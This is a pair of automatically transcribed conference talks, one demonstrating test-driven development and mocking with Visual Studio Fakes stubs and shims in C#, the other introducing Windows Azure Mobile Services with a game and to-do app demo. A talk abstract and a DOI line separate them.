itself that we want to pass out so this requires us to implement the get rate method which is fairly simple to implement because it just becomes a method on the interface itself so that is pretty adequate for our purpose so we are almost there to get this running so what is going on at this point well we have the rate value sitting up here and we want to create a new rate over here and then set the rate value oh let's make sure this is returning the proper value in this case so let's get to this method the vendor rate itself because I think I messed up the return type of this there we go actually I didn't so it's a double this is going to be a currency that's okay so let's see what the error here tells us so the tuple string and double the vendor is good and the amount is going to be double so he is not happy with the string and double here do you see the problem here I don't see the problem we'll see we'll see if he complains a little bit more sorry what was that oh of course markdown what does it do markdown returns I didn't notice that oh how bad that is double of course yeah so let's go back to this and see if that's satisfying him so markdown is going to return double still he says invalid argument let's make this double here and then this is going to be a string which is a vendor so let's go ahead and try this so let's see it does not implement the interface yes okay finally we are getting the right error we 
should be getting in the test method itself so in the test what are we having problem with in the test we have this interface we need to implement this finally so to implement this interface we'll ask him to provide an implementation for the get rate method all that we have to do is simply return a hundred after all here that should be quite sufficient for our purposes so we have the test for one vendor working now and what did we do so far we created an mock object we kind of avoided the service at this point conveniently and then we said given this particular mock object which simply returns a hundred in this test we are going to go asking for a price for the vendor one and we have told the class there's vendor one available and the get rate returns a hundred I'm sorry get rate goes to this guy and gets a hundred marks are done by two and we got a ninety eight that we are returning so our first test is good but we are ready to really think about what if the service actually fails because when you're sending a request to the service something could really go miserably wrong and starts failing well the problem is the service may have different kinds of errors it may give a blank result some garbage at some time what have you a server error how do we deal with it so what I'm going to do here let's go ahead and copy this for a minute and start changing this to give an error situation so rate given one vendor and service gives error let's say how do I deal with that well if I start with this when the service itself fails we are back to square one because I don't have a so I only have one vendor available even that vendor failed so my result is going to be an empty string and a zero point zero because a user doesn't care that it went wrong I care about it right so vendor one is given and I'm going to go as for the rate when I run this little example of course the test should fail right now when it did fail and if you look at why it failed you will notice the reason for the failure here is that we were expecting an empty and a zero but the result was a vendor one and ninety eight so that clearly tells us that that we are not really processing the error in this case but where did we even tell him this will go wrong well obviously our mock was nicely returning a hundred so we got to tell our mock to return an error how do we go about telling our mock to return an error well if I go back to this mock and say a throw new let's say throw new application exception over here and in this case I'm going to say simulated exception and I could go ahead and remove this return hundred for a minute if I do this let's say what's going to happen well both the test actually fail why is the other test failing obviously because we have to return a hundred and not throw an exception so now we are in a little bit of a pickle isn't it how do we deal with this any ideas as one one suggestion you're absolutely right before we go that I'm sure we are all tempted by this right why don't we make this mock throw an exception in one condition and return a result in another condition anybody has tried that before absolutely right one brave one raising the hand over there absolutely we all have tried it a few more people raising the hand that's okay among friends nobody's going to blame you for that right so we all have done that now what will happen if we do that how do we tell him to throw an exception in one case and then return a value in another well we got to probably put a little conditional flag in there and then 
we'll tell him here's a conditional flag and then we will come over here and say bully and throw exception or don't throw exception so our test our mark grow a little bit bigger right now then we go to another test and that test wants a little bit more so what do we end up doing we slowly start putting a little bit and little bit more into this mark and one morning you come to work and suddenly this mark has grown and taken a shape in front of you and you're a little kind of worried about it you sit a little away from it and say that kind of has grown really scary isn't it it started really small and benign and then you know that you've really gone over when one of your colleague comes to you and says I got a question for you do we need to do we need to write unit test for the mock right that's when you know you have really gone overboard with this right so the model of the story is this never make a mock more complex I was actually teaching a course a couple of years ago and and when I started teaching about mock objects one guy said I've been using mock objects for a few years and I hate them I said that's very motivating thank you for setting up the stage for the session but we'll talk about it when I'm done with it right as it was in the middle of the session he raised his hand again and said I know why I now hate mock objects because I always took a mock object and started growing them and over time it becomes overly complex so the first thing to avoid doing is don't create one mock object for an object so what do we do then if you think about an object you are standing in for you want one mock object for one satisfying one test you want another mock object for satisfying another test and yet another mock object or satisfying yet another test and so on entertain the thought for a minute it also leads to a few more concerns but we'll come back to that so what I'm going to do to avoid this problem is let's get back to running this test one more time and the other test is still passing that is good we don't want to break an existing test so I'm going to say here we'll call it as a mock vendor service that blows up right so a mock vendor service that blows up is what I want to call here so how would I create this mock vendor service that blows up so here is my code I'm going to say class mock vendor service that blows up inherits from i vendor service again and in this case of course I'm going to go ahead and implement this method but in this method I'm going to simply say throw application exception and I'm going to simply say simulated exception over here so let's go ahead and say that exception well that's great so far but there is one small problem in this case well in order for this to work properly of course we got to modify our method so I'm going to go to our method itself and say well here we are if I'm going to go ahead and try accessing this by the way and if this was giving an exception catch exception so we'll say exception because it's going to fail at some point if it does fail with an exception in this case I'm going to simply just skip it we'll worry about what to do remember our requirement is we have to log errors where we're not ready to write that right now we'll just put a skip here for now and move on so let's go ahead and run the test one more time and see what it does and we can see our test is passing so we got to that point right now but we solved a problem but we introduced another problem at this point now when I program in Java by the way I program in 
Now, when I program in Java (and by the way, I program in multiple different languages), what I normally do is use anonymous inner classes, so within the test itself I create these mock objects and they stay close to each other. C# doesn't quite give us that kind of flexibility, so we're tempted to put this class outside, and the biggest pain with that approach is that we end up creating several mock classes. Nobody in their right mind wants to see 300 mock classes sitting around; it's kind of scary to think about. So this is the point where we start looking for a tool or library, and you ask: should I use Rhino Mocks, should I use TypeMock, whatever you want to mention. In today's world you take the word "mock" and put a word in front of it and there's a framework or library with that name. So you go find some tool and use it. Like I said, I've used Rhino Mocks in the past, and this is where I would scale into using something like it: within the test itself I would create a mock object and use it. I'm going to do something a little different here, though. Rather than Rhino Mocks I'm going to use the Fakes library in Visual Studio 2012, and the reason is that I'm going to get into a slightly more complex situation later in the session, and it's much easier to work with Fakes there; I'll come back to that. So I'm going to use a library, and the library is Fakes. Let's take one test at a time and convert it over, and when we're done, these two mock classes will simply disappear. Let's get to the first test, because that's a simple test: all it does is say, hey mock, simply return a hundred, that's your whole job. Notice what I do: in the test project I find the library I depend on (this is the test library, this is the library it depends on) and I tell Visual Studio to add a Fakes assembly for it. That brings in the Fakes support, which allows us to easily create stubs. Once I've added it, it generates a piece of code under the hood that we can start using. So I remove the hand-written mock for a minute, and rather than creating a MockVendorService instance here I simply say new CurrencyExchangeLibrary.Fakes and ask for a stub for the IVendorService interface. Instead of creating my own mock class I just rely on the Fakes library to create it, and I instantiate it right here. The burden of creating the mock class separately has disappeared, but of course I still have to tell it what to do. How? This is where lambda expressions provide some nice syntactic sugar. What is the method I'm interested in? GetRateForVendor, remember, that's the method the interface has. But in C# we can have method overloading, so there could be multiple methods with the same name; how do you say which one you're interested in? Multiple methods can share a name, but their signatures have to differ, so a method name combined with its signature makes it unique.
That is why, if you notice over here, the name of the generated property is GetRateForVendorStringString, because the method accepts two strings as parameters. We simply give it a lambda expression: vendorName and currency come in, and all I want it to do is return a value of one hundred. So that's our mock object; we instantiate it right there within the test, and that's all we needed to do. Let's run this test real quick, and notice the test is still passing. Now let's remove the hand-written mock class, because we no longer need it; in fact, while I'm at it, I'll remove the other mock class as well. We got rid of both mock classes we created, so we no longer carry the burden of those extra classes. Instead, let's go to the second test, where the MockVendorServiceThatBlowsUp was sitting, and do the same thing: CurrencyExchangeLibrary.Fakes, a stub for the service, create an instance, and this time for GetRateForVendor, which again takes a vendor name and a currency, I want it to blow up. To do that you add a little curly brace, because you're not just returning a value, and simply say throw new ApplicationException with "simulated exception" as the message to throw back. So that's the exception this little method throws. Let's make sure this works, and we can see all of our tests are still passing. So we did fairly lightweight mocking, but we used the Fakes library. What's going on here? The Fakes library is essentially creating a stub for us automatically; it creates it at compile time, and we set it up by assigning a few properties. GetRateForVendorStringString is actually a public property on the generated class, and you assign a lambda expression to it; that's how you say, this is what I want you to do. When we make the method call, the call goes to the service, which really is the stub we set up; Fakes intercepts it and says, here you go, I'm giving you a value of one hundred, or throwing an exception, whichever you configured. Does that make sense so far? So the benefit: we don't spend time creating mock classes, we simply set up our stub and use it. That's great so far, but let's get to a slightly more complex situation: what if I have two vendors? If I have two vendors I obviously want to handle multiple vendors, but how would I set up the mock for that? Here's my test: "rate, when two vendors given, second vendor giving the higher rate", and I'll just write one test here instead of two. So CurrencyExchange over here is simply a new CurrencyExchange; we have to give it a vendor service, so we say vendorService, and I'm going to set up that service in just a second; we'll come back to it.
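Before wiring up the two-vendor case, here is roughly what the two Fakes-based stubs just described boil down to; the StubIVendorService type and the GetRateForVendorStringString property follow the naming pattern the Fakes generator uses, and the CurrencyExchangeLibrary.Fakes namespace is inferred from the narration:

```csharp
// Test 1: the happy path, just return 100.
var service = new CurrencyExchangeLibrary.Fakes.StubIVendorService
{
    GetRateForVendorStringString = (vendorName, currency) => 100
};

// Test 2: the failure path, blow up instead of returning a value.
var failingService = new CurrencyExchangeLibrary.Fakes.StubIVendorService
{
    GetRateForVendorStringString = (vendorName, currency) =>
    {
        throw new ApplicationException("simulated exception");
    }
};
```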
So what am I going to do with this vendor service? Well, first the expectation: expected equals a new Tuple of string and double once more; I want this one to return vendor two, and I want the value to be, let's say, 48. Then of course var rate equals currencyExchange.GetRate, give it the currency name, and Assert.AreEqual on expected and rate. But for this to work I have to set up the mock properly, and before that we have to tell it about the vendors as well: currencyExchange.SetVendors, and this time I give it both vendor one and vendor two. For that to work we have to make a small change: let's go back to the code and tell SetVendors to take a collection of vendors, so we say params over here and call it vendors rather than vendor, a small refactoring, and this becomes a vendors collection that we have to deal with. We'll keep a vendors field and initialize it to an empty string array to begin with. Good so far. Now, how do I represent the two vendors in the mock object? Let's set that up: vendorService equals, and once more I go to CurrencyExchangeLibrary.Fakes and tell it to create a stub, but this one behaves a little differently from before. Here is GetRateForVendorStringString equals, here come the vendor and currency again, and all I do is return rates for that vendor, where rates is a little map I create right here: var rates equals a new Dictionary of string and double, which accepts a bunch of values for us to use. The values I give it are vendor one with a rate of, let's say, 10, and vendor two with a value of 50. Let's make the compiler happy with a using for the dictionary. I think we're about ready to try this example, but for it to work our code obviously has to use multiple vendors. So back in the code, rather than the if statement, we quickly convert it to a foreach statement: for each vendor in vendors, we go through each of the vendors, and if something fails we want to log it, but we haven't gotten to that yet; we'll come back to it in the next example. Inside the loop, this is the vendor we're interested in talking to, and if its rate wins we use that vendor's name; otherwise we log the exception and move on. Assuming we did all that right, we can try to run the tests.
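A sketch of that whole test, with names inferred from the narration; note the expectation of 48, which is about to come back to bite us:

```csharp
[TestMethod]
public void RateWhenTwoVendorsGivenSecondVendorGivingHigherRate()
{
    var rates = new Dictionary<string, double>
    {
        { "vendor1", 10 },
        { "vendor2", 50 }
    };

    var service = new CurrencyExchangeLibrary.Fakes.StubIVendorService
    {
        // Look the vendor up in the map instead of returning one hard-coded value.
        GetRateForVendorStringString = (vendorName, currency) => rates[vendorName]
    };

    var exchange = new CurrencyExchange(service);
    exchange.SetVendors("vendor1", "vendor2");   // SetVendors now takes params string[]

    var rate = exchange.GetRate("USD");

    Assert.AreEqual(Tuple.Create("vendor2", 48.0), rate);
}
```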
And we can see that the tests are again passing, so we implemented and refactored the code to use multiple vendors. Let's up this a notch now. I'm going to skip doing three vendors, but I want to deal with an error condition: what if a vendor fails? We already saw that we have a way to handle the error, but I want to log a message. How do I log a message when something goes wrong? Let's think about it for a minute by writing a test case. Back in the test class, let's write a little test, "rate, log message when service fails". How do I write a test for it? First we have to decide where to store the log; maybe I want to store my error messages in an errors.log file. So Assert.AreEqual, and I want "errors.log" to be the error file where it gets stored. I'm thinking about the expectation first, and then we'll fill in the code. What is the message I want to store? Assert.AreEqual one more time, and the message I want is "error talking to service for vendor1 on", then a date, but I don't know what date to put yet, so I'll leave it blank for now, and then the error message, "simulated exception". So that's what the logged message should be: error talking to service for vendor one, on that date, with the error message simulated exception. Let's see how we can make this work. First of all I tell my currency exchange that I have a vendor to work with; I tell it there's only one vendor, vendor one, because that's all I care about right now, but I have to make the service blow up this time, which is easy to do. Then currencyExchange.GetRate, and there's the call. What about the captured values? Let's say var errorFile equals empty and var message equals empty as well, so those two start out empty. Now let's set up the mock so it fails instead of returning a value: IVendorService, here's the stub we already created that throws the simulated exception, so I'll just grab that part; you can always refactor these tests to reuse some of those pieces so you don't duplicate them so many times. So this stub blows up, as you can see. Let's run the test and see what it does. When I run it, wait a minute, it says the two-vendor test is broken. Let's see what that was doing; maybe I wasn't noticing a few minutes ago. Why is it failing when the two vendors are given? Pardon me, since that other test is failing I should worry about it first; let's set this new one aside for a minute and come back to it. So back to that test, let's see why it's failing (I didn't pay attention as I was speaking). The error says: aha, the value is 48 instead of 49. Venkat cannot do math on Friday evenings; 49 is 2% down from 50, isn't it? Yeah, thank you. So that's basically why that test failed; 49 is the right expectation. Let's make sure that's working.
Great. So let's get back to this logging test. What does it do? It says: I want to create a mock that blows up, and once it blows up I call GetRate, and GetRate should have logged the error to the error file with that message. But when I run it, it fails, and the reason for the failure is that the file name was empty, whereas I told it the file name should be errors.log; it says, what are you talking about, that never happened. So let's think about how we're going to implement this. I go to my GetRate method: when there's a failure, GetRate should send this information to a file to log the error. So I'm going to talk to a file. What do I do with the file? Let's keep this very simple; typically you'd use some kind of logging library, and that's fine, you can still mock that out as well, but I'm just going to write to a file. So I'm going to write using the File object, but where do I get a File object to mock? Notice that in the previous example, to mock things out, we created a mock object and passed it in through constructor injection; we said you could do constructor injection or setter injection. But none of that works here, because the fact that I want to use a file is my internal business. Typically when you read about test-driven development, people will tell you: that's really important, expose it as an interface so you can inject it. Yes, you can do that, but it causes unnecessary complexity, and I don't want to go that route. It turns out Fakes has a way, a somewhat peculiar approach, but it really is an AOP, aspect-oriented programming, approach: it gives you what are called shims. Shims are a lot more powerful than stubs, but they're also more expensive at runtime, so be very careful using them. What a shim does is intercept your call quietly, right in the middle, and say: rather than going over there, hijack the call to this particular implementation. It's purely an aspect-oriented mechanism where you can intercept calls very quietly and take them elsewhere without the code even knowing you're doing it. So notice what I do to make this work. First, right where we're calling the method under test, I wrap the call: I create a using block, and within it I say ShimsContext.Create. What is this ShimsContext? It gives you the context of execution for the shim; it comes from the testing Fakes namespace, as you can see here. So we call Create to bring the context in, and within it I call the GetRate method. That gives a scope of execution where calls will start being intercepted. But what am I actually intercepting? I know where File lives, it's in the System assembly, so I select the System reference and say add Fakes assembly for System. That brings in the Fakes assembly for System, and now I can say System.IO.Fakes over here. Let's make sure the compiler is happy.
So let's make sure this compiles: I ask it to bring in System.IO.Fakes, and then the shim for the File class, ShimFile, and then I say WriteAllTextStringString. Very much like before, I'm hijacking the WriteAllText method. What does that method take? A file name as a parameter and the message as a parameter, and all I do inside it is set errorFile to the file name and message to the error message. I grab those two values and just store them; that's all. The test still won't pass, obviously, because we haven't changed the code yet, but notice what I do now: I go into the GetRate method and tell it to use this File class to write the log. So back in the catch: when there's an exception, go to the File class and call WriteAllText. Where am I writing? To errors.log. And what am I writing? A message, which is a String.Format. What's the format? Let's grab the expected text from the test: "error talking to service for", then the vendor, which becomes the {0} placeholder, then "on" and the time, which becomes {1}, and then the error message, which becomes {2}. And the values: the first is the vendor name, the second is the time, which I don't know yet, so I'll pass an empty value for now, and the third is exception.Message, whatever went wrong. Let's run this test and see what it does, and notice the test is passing now. So what did we just do? In the test we said: given this code, go ahead and shim away the WriteAllText(string, string) method on the File class. We're sitting out here in the test, telling it what to do deep down there. It's a very powerful form of dependency injection without being intrusive. Very powerful, but be very careful using it; don't use it for everything. Then within the production code, without knowing any of this is happening, we quietly write to the file. One last thing I want to fix before we go: what about the date? Obviously I want to record the date and time when the failure happened, but there's a problem: if I say DateTime.Now, then whenever the test runs it picks up the current time, and how do I know what value to expect in the test? You might say, hey, why don't you compute the date and time in the test and pass it in? Then you're still fighting microsecond differences, and tests start failing at random times, which becomes really annoying. To fix the problem, I'll simply put a fixed value in the expectation: 6/14/2013 at 8:00 AM. So I put an arbitrary time right here and said: that's the failure time I want to see.
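Pulling the file-logging pieces together, the shim-based test described above looks roughly like this; the exact message format and the "USD" currency are placeholders, and the date part of the assertion only matches once DateTime.Now is shimmed, which is the next step:

```csharp
[TestMethod]
public void RateLogsMessageWhenServiceFails()
{
    var errorFile = string.Empty;
    var message = string.Empty;

    using (Microsoft.QualityTools.Testing.Fakes.ShimsContext.Create())
    {
        // Detour File.WriteAllText(string, string) and just capture the arguments.
        System.IO.Fakes.ShimFile.WriteAllTextStringString = (path, contents) =>
        {
            errorFile = path;
            message = contents;
        };

        var service = new CurrencyExchangeLibrary.Fakes.StubIVendorService
        {
            GetRateForVendorStringString = (vendorName, currency) =>
            {
                throw new ApplicationException("simulated exception");
            }
        };

        var exchange = new CurrencyExchange(service);
        exchange.SetVendors("vendor1");
        exchange.GetRate("USD");
    }

    Assert.AreEqual("errors.log", errorFile);
    // This line needs the DateTime.Now shim that comes next before it can pass.
    Assert.AreEqual(
        "error talking to service for vendor1 on 6/14/2013 8:00:00 AM simulated exception",
        message);
}
```

On the production side, the catch block just calls File.WriteAllText("errors.log", ...) with a String.Format of the vendor name, the time, and the exception message, exactly as described above, completely unaware that the test has detoured the call.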
Of course, I now go to the production code and put DateTime.Now in for the date value, and when I run the test, notice what happens: the test fails, and the failure message says, you expected the fixed date I typed at 8 AM, but what I really got was 6/14/2013 3:59:22 PM. Let's fix that quickly. I can go back to the test message and adjust the date format (the leading zero I typed doesn't match how the date is rendered), but it still fails, because the time portion is whatever the clock says right now. What about that value? No worries, we can easily fix that too: I go back into the shims and say System.Fakes, bring in the ShimDateTime, and since DateTime.Now is a static property I take its NowGet and ask it to return a new DateTime with whatever value I want to simulate. What values does the DateTime constructor take? A year, 2013, month 6, day 14, 8 AM; I give it those values, and that's what it returns. Run the test, and now we've faked away DateTime itself: when the code calls DateTime.Now it no longer gets the real time, but the simulated time we set up in the fakes here. So this gives a fairly powerful way to reach in and mock, but like I said, be very careful using it, don't do this for everything you do, and it can also be a little slow to execute. It really does give us a way to deal with the dependencies, though. Once we finish this, we can step back and start writing the real class that implements the interface, and we can approach that in a very similar way; nothing forces you to write the real code until the tests drive you there, and gradually you get to that point. If you're interested in the code that talks to the real web service, feel free to download the code from my website and play with it. It's a fairly simple concept, but it's more of an approach to follow, and the tools definitely help with what we're trying to do. Test-driven development is extremely approachable. I've looked at pretty gnarly code to write tests for, and I haven't yet seen a problem where I'd say this code is untestable; it has always been a design issue, and once we figure out how to reach in, tools do help. But tools are not the only solution; it's the combination of the approach we take and the tools we apply that makes the big difference. I hope you found that useful. Thank you.
|
Test Driven Development is easy, if your code has no dependencies that is. The reality of our world is mired with dependencies, however. All the idealistic approaches to unit testing soon fall flat when the tests meet the realities. Mocking can be an effective way to alleviate these concerns, at least that is what we have been told. However, mocks often tend to burden our tests and make them hard to maintain. Seems like we are in a quagmire. In this presentation we will learn some simple techniques that can help us be quite effective with mocking. We will start with a couple of problems that have dependencies. We will then take up the task of creating automated unit tests for them. Along the way, using testing and mocking tools, we will learn some effective ways to deal with the dependencies and create maintainable automated tests.
|
10.5446/51529 (DOI)
|
Hello, can you guys hear me? Yeah. It's 5.40, so time to get started. Thank you for coming to my talk. My name is Yavor. I work at Microsoft in the Windows Azure group. I work on a product called Windows Azure Mobile Services, which is a very easy solution for you to build Cloud-connected mobile applications. So in the next hour, we're going to spend about 20 minutes introducing what mobile services is, and most of the talk just going through our key scenarios doing a bunch of coding demos. So I hope that's what you're here to basically learn how to write an app with mobile services. I know it's the last session of the day, so I'm a little bit tired. I was a little bit sleepy going up the stairs here until I realized my podium is actually floating over the edge here a little bit. So I woke up pretty quickly after that. All right. So how many of you have used mobile services before? Let's see a show of hands. Okay. It's very bright in here. Maybe five people. How many of you have actually built an app and finished it with mobile services? Okay. So two experts we got here and everybody else pretty new. That's pretty good. So yeah. Pretty much covered with the agenda. What we're going to cover, we're going to spend a little bit of time at the end talking about kind of future things that are coming up with mobile services, what's in plan for the next six months or so, and then leave a little bit of time for Q&A at the end. So I already talked about this, but what is mobile services? Why are we all here? Well, we know there's a lot of developers out there that want to write apps for mobile devices, Windows Phone, Windows 8, iOS, Android, but they don't know how to write server code. So the goal of our product is to enable them to easily write these connected apps without the need for server code. If you'd like to write server code, if you're a server developer, you can by all means come and use our product as well. But kind of our key message is you don't have to. We provision the back end for you, so you don't have to worry. So before I go into this, let me actually show you what kind of apps we're talking about here. So let's say I'm a little hobbyist developer and I want to write a little game. So I have this Connect 4 game. So I connect four dots in a row and I win. And I want to put it in the store and I want to make it social. I want people to be able to play with each other. So let's go and see what I came up with. Here's my little very primitive UI. And I have kind of on the left side, you'll see the open games. So these are games that are waiting for players. And then on the right side, you see the games I'm participating in. So this is kind of my simple game that I built here. And then I can create a new game. So I press Start New Game down here. And I'll open a new game. So here you go, game 14. And the first thing you notice, it actually knows who I am. I didn't have to sign into this app. So that's one of the things that mobile services does for you. It takes care of authentication. So I threw a single sign on the app and you already who I was without me having to type in my credentials. OK, great. So I created a new game. What if I want to join an existing game? Let's say I want to join game 10 here. And I have a little loophole in my code that lets me play with myself. So I can actually demo this without inviting somebody else on stage. So there you go. Here's my game. And then I can go ahead and try and make a move. OK, and what just happened? 
I actually, up here in the corner, you didn't hear it, but it popped up. It's a push notification. So because I'm both the red player and the yellow player, it's like, oh, well, it's your turn. So OK, I make another move. And I'll get another push notification. So as a player needs to do something, he gets a push from the server. OK, so that's great. I have a Windows 8 app. But I want to maximize my revenue. I want to go and use the Windows Phone Store as well. I want to go in the iTunes Store as well. So let's go to more platforms. I don't want to just do Win 8. So if I head here to my emulator, I actually have Windows Phone 8 brought up. I have, using the same mobile back end in the cloud, I've built a Phone 8 version. And Phone 8 is a little bit different from Win 8. Authentication works a little bit differently. So I have to actually log in this time. But I'm using my Microsoft account. So I didn't have to create a different set of credentials or anything like that. And I can't hide my password, so I have to type it kind of in the corner here. If somebody knows a trick about how to do that, let me know. All right, so I'm logged into my app now. I have to authorize it. I get the same familiar view of the open games and the games that I'm participating in. And you'll notice it's the same server data. It's the same list of games I had before. I go into my game number nine or 10, whichever one I was playing here. And so it's pretty much the same UI. I can go and make a move again. And I have the Windows 8 version installed, so I still get my push notification, no matter which device I'm playing on. If I'm playing on a Win 8, I get it on the phone. If I'm playing on the phone, I get it on Win 8. So let's try it the other way around. So I'll make another move here. I'll go back to my Win 8 app. I'll make a move here. And then if I go back to the phone now, actually, I need to minimize the app so I get my toast notification. So if I go back, make another move in Win 8, and then go back to my phone here, you'll notice I got a phone notification as well. So it does the right thing. It notifies all the devices where I'm playing the game. It knows who I am, sends the push notifications correctly. So that's the value proposition of mobile services. It does things like auth, push, and data. Really super easy. OK, so it's just kind of another way of saying that. We have these kind of vertical pillars, identity, messaging, notifications. We provide kind of a common single management experience. So you go to the Azure portal, you go in one place, and you manage all these things for your mobile application. And we provide a single API, a single consistent API that you can code against to access all these capabilities. That's really what mobile services provides for you. Our mantra for mobile services is really simplicity with enablement. And what we mean by that is simple things should be really simple. Getting the three things I mentioned, push, auth, data, getting those things started should take you five minutes, or 10 minutes, but no more than that. Then if you become an advanced developer at that point, or if you already are an advanced developer, if you already have been writing server code for the longest time, you shouldn't be trapped. You should be able to extend it. So that's why we say simplicity with enablement. We leave a lot of extensibility points open for you. So you can go ahead and build on top of what we offer. I like to put these Legos up here. 
You can be the guy on the left who wants to just follow the directions, and he knows that in five minutes he'll end up with this exact product that he's aiming for. So it's very productive, very predictable. We want to do that. We also want to cater to the guy who wants to kind of tinker and add things. So we try not to be one or the other. We try to kind of let you do both. We're a pretty new service in Azure. We've actually been around in the portal for maybe only around a year now, or even less than a year. But we're a very feature rich platform. So some of the features we have are listed here. Some are in the pipeline, and even not listed yet. But we support a pretty full set of clients at this point. Windows 8, Windows Phone 8, Windows Phone 7.5 we added recently, Android, iOS. We have this HTML client, so you can actually use a website and this JavaScript to talk to your mobile back end as well. Or a PhoneGap application. So that's kind of an interesting cross-platform scenario where you guys are familiar with PhoneGap, most of you? It's a solution that lets you write your application in JavaScript and then publish it as iOS, Android, and all the different stores. So kind of a way to do it once and get in all the different stores. So you can do that with our HTML client. So yeah, pretty good support across the board for the different clients. We even support actually ASP.net. So if you want to have your server back end talking to your mobile back end for some reason, I mean there's some people that like to do that. We even support that for you. We support authentication with the four big auth providers today. Microsoft Account, Facebook, Twitter, and Google. We support push notifications. You had a question? Yeah, do you support connecting the different authentication providers to the server account? No, so that's a feature that we don't have yet, which is the question was can I connect my different identities from the different providers into a single identity? We don't support that yet, but it's something we've thought about as coming probably in the next six months to a year. So push notifications, I already demonstrated. Scheduled tasks is one thing we added just about six months ago where if you want to have a cron job running or a scheduled task inside your mobile service to send periodic notifications out to all your customers, you can do that. The next point is actually a really important one, which is our ability to write actually server side logic. It doesn't have to be simple, like I said. And we support the server side programming model where you can write business logic. You can write validation rules and things like that. And it's all Node.js, so you can use the entire Node package manager system to bring in extra functionality into your back end. It's actually quite rich and quite extensible. The next point is a custom API, so that's kind of more rich HTTP APIs. That's a brand new thing that actually came out just today. You guys are the first ones to hear about this feature. Scott Guthrie hasn't even blogged about it yet, but he said I could talk about it to you guys. The next one is also brand new. So we support source control. So you can now edit your scripts either in the browser or via Git, publish them via Git to the cloud. And then we have great extensibility. We integrate with Pusher and SendGrid. So if you want to use third party services with your mobile service, you can do that as well. So pretty packed service. We do a lot. 
And for services still in preview in Windows Azure, I feel that's great. It's a really useful little thing. We also focus a lot on great developer resources. So we have our developer center, which gives you tutorials in all the different clients. So you get to pick. I'm running an Android app, and then we have an Android version of every tutorial. So that's pretty great. The other thing is GitHub. We keep almost all of our source code on GitHub. And it's open. We develop on GitHub, actually. So it's not like we hide away, and then we publish the GitHub once every six months. Our bugs are actually in the issue tracker. And you'll see our developers making commits into this thing daily. So we try to be very open. And we actually even take contributions back. So if there's a bug that we're sitting on and not fixing, and it's really blocking you, you can actually go ahead, open a pull request. Me or one of the other PMs on the team, probably Paul, we're going to review it, get back to you, and merge it into the product. And it's going to ship within the next couple of weeks. And you have your bug fix in the Microsoft products. That's pretty great. And because NDC is such a special conference, I'm giving you all 10 mobile services for free, each one of you. I'm getting blank stares. They're always free. 10 are always free. It's not really. Sorry. But there is another thing, actually. I'm giving you all free car. It's actually kind of true. So if you have an MSDN subscription with Azure, and you have an MSDN subscription, and you haven't activated your Azure, whatever it is, credit as part of the MSDN subscription, they're actually running a promotion right now. And as a chance you'll win an Aston Martin if you go to this URL. So if you haven't activated Azure on your subscription, there's never a better time than now to get your Aston Martin. That's actually a real thing, not a joke. All right, so enough talking. Let's jump into the code here and see how we build one of these things. So the first thing I'm going to do is head over to the Azure portal, which is where all good things start. So I go to the Mobile Services tab here on the left. It's this little icon that looks like a phone with a little sugar cube inside of it. And here's all my apps that I've listed. So I created just a few minutes ago this testing app. It's completely empty. It doesn't have anything. But I just want to give you an idea of the experience of starting out with mobile services. So it's a blank app. All I did is say Create. And then I see here the choice of the different client platforms. So I get to decide how I want to get started with mobile services, which platform I'm going to use. Let's say I'm trying to write an Android application. So I'll click on Android. And we have this kind of contextual getting started experience here with three easy steps. The first step is it tells me go ahead and install the Android developer tools, because you need that to write Android apps. Then I can create a table to store my data. So it's just I click this button, and it's going to do this to do items. So it's going to be like a to-do list application. And it says I already created it. If it wasn't there, it would have created it for me. And then I can download a pre-populated, pre-configured Android application that I can get started with. So I can go hit Download, and it'll just bring this zip file down. It's about a megabyte. Very easy. I've already done that. And because my emulator is super slow, I went into Eclipse. 
I imported my app here with our mobile library here. Mobile Services Library. And then I started up in the emulator. And this is what you're going to get right out of the box without doing any work, is this cloud connected app. And so I can go and add something here. Let's say give my talk. Add an item to the list. And then I can go and also mark something completed. It's always risky doing on stage, because these emulators have very particular networking requirements. And sometimes it'll drop off without knowing why. So I'm making changes to my server data. And if I just head back to the portal here and click on this data tab, I see the to-do item table I just created. And I can actually browse all my items in real time, the ones that are stored in my cloud back-end. So here's the give my talk item I just created. I can check in real time whether it made it. So there you go, in just literally five minutes. And you can have an app that you can take to your boss and be like, look, we have an Android expense app now. Finally, it's done. Just change the title from to-do list to expenses. And you're all expense approval and you're done. So great. So that's how you do the very basic thing, create a table. Let's look at some of the other tabs here. Actually, while I'm in the table itself with my data here, there's this script tab. And I talked about the server scripts that you can write. So I can go ahead here and actually write a script for all the four code operations against my data. So if I want to validate that you're not allowed to do list with swear words in it, or you're not allowed to submit an expense for more than $1,000, I just write a simple node script here. Some of the other tabs, the scheduler, is where I do the scheduled jobs that I mentioned. Push and Identity is where I configure my push and identity and authentication settings and things like that. Logs is if my app generates logs in the server, we want to make it very easy for you guys to see those logs. You don't have to go remote into the VM and poke around some folder somewhere. We just bring them right here to the portal. So that's kind of a very quick lap around mobile services and the basic things it does. Any questions before I dive into my game and show you how that was built? Question right there? I'm sorry, I couldn't hear you. Support for node on server scripts and for what exactly? No, so currently our server, the question is do we support anything else but node in our server scripting model? Currently we only support node in our server scripts, but it's definitely one of the top two or three things that people ask for, especially if you're a.NET developer. You're writing your Windows 8 app in.NET. You want to write your server in.NET as well. So that's something we're definitely looking at. It's a little bit tricky though because we don't want to scare away people that want to write Android apps and iOS apps. We picked node because it's kind of a neutral thing that everybody's fine with. If we made it.NET, we would have scared away a lot of people. So we want to ideally have a choice for you and let you pick which one. Great, so let's go into my little app. So here's, I've already pre-created it. It's called Align 5. Here's my errors from before. But the first thing we want to look at is kind of my data tab here. And so my app, my game is powered by these two tables, my games and then my players. 
